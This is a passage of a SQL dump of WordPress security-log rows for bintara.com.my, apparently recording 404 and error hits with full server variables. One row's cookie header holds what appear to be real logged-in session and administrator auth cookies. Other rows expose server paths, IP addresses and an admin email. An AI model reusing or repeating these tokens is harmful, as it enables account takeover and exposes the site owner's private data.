rkQK0h3xiEgDLh@JmMCwAAAAU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.112\";s:11:\"REMOTE_PORT\";s:5:\"50824\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYrkQK0h3xiEgDLh@JmMCwAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569383488.7308\";s:12:\"REQUEST_TIME\";s:10:\"1569383488\";}}','notice','2019-09-25 03:51:30','2019-09-25 03:51:29',31090016,32899512,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.112'),(26960,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/wp-admin/admin-ajax.php\";s:14:\"CONTENT_LENGTH\";s:3:\"216\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"9\";s:13:\"H2_STREAM_TAG\";s:4:\"23-9\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:46:\"application/json, text/javascript, */*; q=0.01\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:899:\"wp-saving-post=1450-check; icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7C22dcac49362989fcdd4214ab673d9065add0865294c218fd5bbfddb12474bd7a; wordpress_test_cookie=WP+Cookie+check; tk_ai=jetpack%3ACr1m53AVInkeBBzVOwYU6wa7; wordpress_sec_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569549589%7CwxFU5uxdnFW9Gq3UiW0mHZfuRJSxw0RKgLhJ7cxAoJF%7Cd12b48178200105abbf7b80c3d7bbd504779f027920d783b0ae54348327dd404; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569549589%7CwxFU5uxdnFW9Gq3UiW0mHZfuRJSxw0RKgLhJ7cxAoJF%7C9e24c5ccc747f6bb4c97de120455bfdb3f2ac0f09b25cfc9d0439f74c8a1a55b; wp-settings-time-1=1569376874; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff; wp-saving-post=1450-saved\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_ORIGIN\";s:22:\"https://bintara.com.my\";s:12:\"HTTP_REFERER\";s:97:\"https://bintara.com.my/wp-admin/post.php?post=1450&action=edit&ip-geo-block-auth-nonce=310d94dff1\";s:19:\"HTTP_SEC_FETCH_MODE\";s:4:\"cors\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:21:\"HTTP_X_REQUESTED_WITH\";s:14:\"XMLHttpRequest\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"9\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"23-9\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYrk4K0h3xiEgDLh@JmNhwAAAAk\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYrk4K0h3xiEgDLh@JmNhwAAAAk\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.112\";s:11:\"REMOTE_PORT\";s:5:\"64751\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:10:\"SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYrk4K0h3xiEgDLh@JmNhwAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569383649.0943\";s:12:\"REQUEST_TIME\";s:10:\"1569383649\";}}','notice','2019-09-25 03:54:12','2019-09-25 03:54:09',31928968,32191088,'https://bintara.com.my/wp-admin/admin-ajax.php',1,1,'115.132.145.112'),(26961,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"8FE6B338-4C8F-4F2B-AAAA-2742EA54A56F\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYrszvTT-ZZc8Zptu2CajwAAAQQ\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.112\";s:11:\"REMOTE_PORT\";s:5:\"51205\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYrszvTT-ZZc8Zptu2CajwAAAQQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569385678.4182\";s:12:\"REQUEST_TIME\";s:10:\"1569385678\";}}','notice','2019-09-25 04:28:00','2019-09-25 04:27:58',31090632,32899608,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.112'),(26962,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"CD8FF686-01E3-4B04-9C2F-320B21E281E3\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYrteq0h3xiEgDLh@JmabQAAAAU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.112\";s:11:\"REMOTE_PORT\";s:5:\"58719\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYrteq0h3xiEgDLh@JmabQAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569385851.0316\";s:12:\"REQUEST_TIME\";s:10:\"1569385851\";}}','notice','2019-09-25 04:30:53','2019-09-25 04:30:51',31091416,32895944,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.112'),(26963,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"8FE6B338-4C8F-4F2B-AAAA-2742EA54A56F\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYrz5fTT-ZZc8Zptu2CclgAAARQ\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.112\";s:11:\"REMOTE_PORT\";s:5:\"51778\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYrz5fTT-ZZc8Zptu2CclgAAARQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569387494.0761\";s:12:\"REQUEST_TIME\";s:10:\"1569387494\";}}','notice','2019-09-25 04:58:15','2019-09-25 04:58:14',31090968,32907176,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.112'),(26964,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/author/admin/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/author/admin/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYsITfTT-ZZc8Zptu2ChlgAAAQI\";s:12:\"REDIRECT_URL\";s:14:\"/author/admin/\";s:11:\"REMOTE_ADDR\";s:14:\"192.249.53.158\";s:11:\"REMOTE_PORT\";s:5:\"49437\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:10:\"SCRIPT_URL\";s:14:\"/author/admin/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYsITfTT-ZZc8Zptu2ChlgAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569392718.0459\";s:12:\"REQUEST_TIME\";s:10:\"1569392718\";}}','notice','2019-09-25 06:25:19','2019-09-25 06:25:18',30761280,32574776,'https://bintara.com.my/author/admin/',1,0,'192.249.53.158'),(26965,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:50:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569393127.0195889472961425781250\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569393127.0195889472961425781250\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYsJ560h3xiEgDLh@JmwLwAAAAQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYsJ560h3xiEgDLh@JmwLwAAAAQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"44324\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYsJ560h3xiEgDLh@JmwLwAAAAQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569393127.1258\";s:12:\"REQUEST_TIME\";s:10:\"1569393127\";}}','notice','2019-09-25 06:32:08','2019-09-25 06:32:07',30761048,31014200,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1569393127.0195889472961425781250',1,0,'103.6.198.69'),(26966,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYsVv4hQ4pD4smMfGAQs@wAAAI8\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.129.131\";s:11:\"REMOTE_PORT\";s:5:\"64814\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"